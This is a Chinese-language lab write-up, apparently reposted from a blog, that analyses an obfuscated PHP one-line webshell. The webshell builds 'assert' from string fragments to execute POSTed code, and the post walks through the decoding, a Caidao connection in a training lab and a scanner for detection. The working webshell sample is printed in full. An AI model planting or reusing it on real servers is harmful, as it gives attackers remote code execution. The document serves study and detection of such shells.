标签:WebShell 分析 代码 查杀 拼接 字符串 溯源
WebShell代码分析溯源(三)
一、一句话变形马样本
<?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?>
二、代码分析
1、调整代码格式
2、分析代码
分析代码,首先创建一个g数组,然后拼接字符串,把拼接之后的字符串赋值给gg变量,字符串拼接的过程:$g[1]为s,chr('116')为t,因此拼接之后的字符串为assert。这时整个一句话代码就变成了<?php @assert($_POST[get]);?>,注:@为错误抑制符。
三、漏洞环境搭建
1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第3题)),地址:
https://www.mozhe.cn/bug/detail/S3FBSGhXYlU2a09ybG83UVRiQmJxUT09bW96aGUmozhe
2、代码环境,下载代码
3、分析(上面已经分析过了)
4、使用菜刀连接
5、执行任意代码
四、后记
学习常用webshell扫描检测查杀工具---河马 WebShell查杀,网址: http://www.shellpub.com/
使用河马进行webshell查杀
标签:WebShell,分析,代码,查杀,拼接,字符串,溯源 来源: https://www.cnblogs.com/yuzly/p/11745722.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。